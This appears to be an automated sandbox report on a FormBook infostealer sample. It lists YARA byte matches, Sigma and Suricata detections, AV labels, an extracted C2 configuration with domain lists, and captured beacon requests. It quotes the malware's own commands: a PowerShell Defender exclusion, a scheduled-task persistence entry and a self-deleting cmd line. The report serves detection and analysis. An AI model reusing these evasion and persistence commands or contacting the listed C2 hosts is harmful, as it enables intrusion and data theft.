9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xe5e91:$a1: 3C 30 50 4F 53 54 74 09 40 0x1142b1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1416d1:$a1: 3C 30 50 4F 53 54 74 09 40 0xfc800:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x12ac20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x158040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xea5ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x118a1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x145e3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xf54e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x123907:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x150d27:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xe9548:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe97b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x117968:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x117bd2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x144d88:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x144ff2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf52e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x123705:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x150b25:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf4dd1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1231f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x150611:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf53e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x123807:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x150c27:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf555f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x12397f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x150d9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xea1ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1185ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x145a0a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xf8489:$sqlite3step: 68 34 1C 7B E1 0xf859c:$sqlite3step: 68 34 1C 7B E1 0x1268a9:$sqlite3step: 68 34 1C 7B E1 0x1269bc:$sqlite3step: 68 34 1C 7B E1 0x153cc9:$sqlite3step: 68 34 1C 7B E1 0x153ddc:$sqlite3step: 68 34 1C 7B E1 0xf84b8:$sqlite3text: 68 38 2A 90 C5 0xf85dd:$sqlite3text: 68 38 2A 90 C5 0x1268d8:$sqlite3text: 68 38 2A 90 C5 0x1269fd:$sqlite3text: 68 38 2A 90 C5 0x153cf8:$sqlite3text: 68 38 2A 90 C5 0x153e1d:$sqlite3text: 68 38 2A 90 C5 0xf84cb:$sqlite3blob: 68 53 D8 7F 8C 0xf85f3:$sqlite3blob: 68 53 D8 7F 8C 0x1268eb:$sqlite3blob: 68 53 D8 7F 8C 0x126a13:$sqlite3blob: 68 53 D8 7F 8C 0x153d0b:$sqlite3blob: 68 53 D8 7F 8C 0x153e33:$sqlite3blob: 68 53 D8 7F 8C
0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x76071:$a1: 3C 30 50 4F 53 54 74 09 40 0xa4491:$a1: 3C 30 50 4F 53 54 74 09 40 0xd18b1:$a1: 3C 30 50 4F 53 54 74 09 40 0x8c9e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xbae00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xe8220:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7a7df:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xa8bff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xd601f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x856c7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xb3ae7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xe0f07:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x79728:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x79992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa7b48:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa7db2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd4f68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd51d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x854c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb38e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe0d05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x84fb1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb33d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe07f1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x855c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb39e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe0e07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8573f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb3b5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe0f7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7a3aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xa87ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd5bea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x88669:$sqlite3step: 68 34 1C 7B E1 0x8877c:$sqlite3step: 68 34 1C 7B E1 0xb6a89:$sqlite3step: 68 34 1C 7B E1 0xb6b9c:$sqlite3step: 68 34 1C 7B E1 0xe3ea9:$sqlite3step: 68 34 1C 7B E1 0xe3fbc:$sqlite3step: 68 34 1C 7B E1 0x88698:$sqlite3text: 68 38 2A 90 C5 0x887bd:$sqlite3text: 68 38 2A 90 C5 0xb6ab8:$sqlite3text: 68 38 2A 90 C5 0xb6bdd:$sqlite3text: 68 38 2A 90 C5 0xe3ed8:$sqlite3text: 68 38 2A 90 C5 0xe3ffd:$sqlite3text: 68 38 2A 90 C5 0x886ab:$sqlite3blob: 68 53 D8 7F 8C 0x887d3:$sqlite3blob: 68 53 D8 7F 8C 0xb6acb:$sqlite3blob: 68 53 D8 7F 8C 0xb6bf3:$sqlite3blob: 68 53 D8 7F 8C 0xe3eeb:$sqlite3blob: 68 53 D8 7F 8C 0xe4013:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: CMSTP Execution Process Creation

Source: Process started

Author: Nik Seetharaman: Data: Command: /c del "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", CommandLine: /c del "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\cmstp.exe", ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 7532, ParentProcessName: cmstp.exe, ProcessCommandLine: /c del "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", ProcessId: 7676, ProcessName: cmd.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", ParentImage: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe, ParentProcessId: 1076, ParentProcessName: CZyOWoN2hiszA6d.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", ProcessId: 4368, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp620B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp620B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe, ParentImage: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe, ParentProcessId: 7300, ParentProcessName: dacYzRiJuWECy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp620B.tmp", ProcessId: 7564, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", ParentImage: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe, ParentProcessId: 1076, ParentProcessName: CZyOWoN2hiszA6d.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp", ProcessId: 3332, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", ParentImage: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe, ParentProcessId: 1076, ParentProcessName: CZyOWoN2hiszA6d.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", ProcessId: 4368, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe", ParentImage: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe, ParentProcessId: 1076, ParentProcessName: CZyOWoN2hiszA6d.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp", ProcessId: 3332, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 188.114.97.3

Timestamp:	2024-08-05T08:54:25.745305+0200
SID:	2031453
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 23.227.38.74

Timestamp:	2024-08-05T08:52:00.046445+0200
SID:	2031453
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 103.235.47.188

Timestamp:	2024-08-05T08:51:40.721881+0200
SID:	2031453
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 89.117.188.72

Timestamp:	2024-08-05T08:53:22.625565+0200
SID:	2031453
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-08-05T08:49:56.887364+0200
SID:	2031453
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 107.180.116.42

Timestamp:	2024-08-05T08:52:41.117962+0200
SID:	2031453
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.5 - Destination IP: 3.33.130.190

Timestamp:	2024-08-05T08:52:20.643690+0200
SID:	2031453
Source Port:	49723
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.dyahwoahjuk.store	Avira URL Cloud: Label: phishing
Source: http://www.dnwgt80508yoec8pzq.top/v15n/www.kapalwin.live	Avira URL Cloud: Label: malware
Source: http://www.kurainu.xyz	Avira URL Cloud: Label: malware
Source: http://www.dyahwoahjuk.store/v15n/	Avira URL Cloud: Label: phishing
Source: http://www.dnwgt80508yoec8pzq.top/v15n/?Yn=pafJh4lutq9sQhYUfomZg+metsJ7WiBQxMAtxV3erKtPIYzS0c99vEziQ+Pcc2PtKrq6&mv=Y4QppplhSjwxWBd	Avira URL Cloud: Label: malware
Source: http://www.vicmvm649n.top/v15n/	Avira URL Cloud: Label: malware
Source: http://www.kurainu.xyz/v15n/www.culturamosaica.com	Avira URL Cloud: Label: malware
Source: http://www.dyahwoahjuk.store/v15n/www.mpo525.monster	Avira URL Cloud: Label: phishing
Source: http://www.vicmvm649n.top/v15n/www.go4stores.com	Avira URL Cloud: Label: malware
Source: http://www.vicmvm649n.top/v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd	Avira URL Cloud: Label: malware
Source: http://www.dnwgt80508yoec8pzq.top/v15n/	Avira URL Cloud: Label: malware
Source: http://www.kurainu.xyz/v15n/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.gtur.top/v15n/"], "decoy": ["dyahwoahjuk.store", "toysstorm.com", "y7rak9.com", "2222233p6.shop", "betbox2341.com", "visualvarta.com", "nijssenadventures.com", "main-12.site", "leng4d.net", "kurainu.xyz", "hatesa.xyz", "culturamosaica.com", "supermallify.store", "gigboard.app", "rxforgive.com", "ameliestones.com", "kapalwin.live", "tier.credit", "sobol-ksa.com", "faredeal.online", "226b.xyz", "talktohannaford500.shop", "mxrkpkngishbdss.xyz", "mirotcg.info", "turbo3club.site", "hjnd28t010cop.cyou", "marveloustep.shop", "syedlatief.com", "comfortableleather.com", "alltradescortland.com", "dnwgt80508yoec8pzq.top", "kedai168ef.com", "gelgoodlife.com", "nxtskey.com", "milliedevine.store", "wordcraftart.fun", "mpo525.monster", "bt365851.com", "dogeversetoken.net", "boostgrowmode.com", "dacapital.net", "project21il.com", "go4stores.com", "brunoduarte.online", "sexgodmasterclass.com", "wuhey.shop", "jdginl892e.xyz", "agenkilat-official.space", "hacks.digital", "suv.xyz", "fwbsmg.life", "vicmvm649n.top", "wbahdfw.icu", "creativelyloud.com", "merrycleanteam.com", "solar-systems-panels-58747.bond", "rotaryclubofmukono.com", "bethanyumcnola.info", "breezafan.com", "ny-robotictoys.com", "lawyers-br-pt-9390663.fyi", "neurasaudi.com", "dgccb.com", "sayuri-walk.com"]}

Multi AV Scanner detection for domain / URL

Source: turbo3club.site

Virustotal: Detection: 6%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe

ReversingLabs: Detection: 21%

Multi AV Scanner detection for submitted file

Source: CZyOWoN2hiszA6d.exe	ReversingLabs: Detection: 21%
Source: CZyOWoN2hiszA6d.exe	Virustotal: Detection: 38%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CZyOWoN2hiszA6d.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.4474632903.00000000049B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4474232740.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2119442829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2233818819.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2047034482.000000000442E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4473749017.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: CZyOWoN2hiszA6d.exe

Joe Sandbox ML: detected

Source: CZyOWoN2hiszA6d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: CZyOWoN2hiszA6d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cmstp.pdbGCTL source: CZyOWoN2hiszA6d.exe, 00000009.00000002.2119998400.0000000001710000.00000040.10000000.00040000.00000000.sdmp, CZyOWoN2hiszA6d.exe, 00000009.00000002.2120061391.0000000001797000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4473546290.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: CZyOWoN2hiszA6d.exe, 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4474981197.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4474981197.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.2121854419.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.2119897529.000000000480B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000014.00000003.2226779254.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234653816.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234653816.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000014.00000003.2230420750.000000000436C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CZyOWoN2hiszA6d.exe, CZyOWoN2hiszA6d.exe, 00000009.00000002.2120275621.0000000001A40000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 0000000D.00000002.4474981197.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000002.4474981197.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.2121854419.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 0000000D.00000003.2119897529.000000000480B000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000014.00000003.2226779254.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234653816.0000000004520000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234653816.00000000046BE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000014.00000003.2230420750.000000000436C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmstp.pdb source: CZyOWoN2hiszA6d.exe, 00000009.00000002.2119998400.0000000001710000.00000040.10000000.00040000.00000000.sdmp, CZyOWoN2hiszA6d.exe, 00000009.00000002.2120061391.0000000001797000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 0000000D.00000002.4473546290.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mstsc.pdbGCTL source: dacYzRiJuWECy.exe, 00000010.00000002.2232733998.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234309196.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mstsc.pdb source: dacYzRiJuWECy.exe, 00000010.00000002.2232733998.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, 00000014.00000002.2234309196.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003C894B memset,memset,memset,SHGetFolderPathW,memset,SHGetFolderPathW,CmFree,memset,FindFirstFileW,GetLastError,memset,memset,FindNextFileW,FindClose,		13_2_003C894B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 13_2_003CB3C4 memset,GetPrivateProfileStringW,FindFirstFileW,memset,FindNextFileW,		13_2_003CB3C4

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 3.33.130.190 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.gtur.top/v15n/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.hatesa.xyz

Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=eKJokfhRlZ6TJn38gns6VD6cymqx2Da3HErd8WBjDQDJ0kZiIGavcwgaXQXM/YhbITnk&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.mirotcg.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=AGM8cYat7abGFPmKwezZqVwW1aBQQM3PRq0t0OO3Vqk/+tNsWTohgGYaGZGPsfo13B1a&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.mpo525.monsterConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=UsBn8mn1PUl4czyMQZxenuqc6dPBc+Q3khu6MN2NNQj7YA4ug5lWpId+R/K0fD87Hm6v&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.vicmvm649n.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /v15n/?Yn=TZ7dEV+dePhm1jul6DRI/086qPMy6e3XQqPVR8kv79G9dLkwb8ABVO+elO8aT8i2Z4Zj&mv=Y4QppplhSjwxWBd HTTP/1.1Host: www.go4stores.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
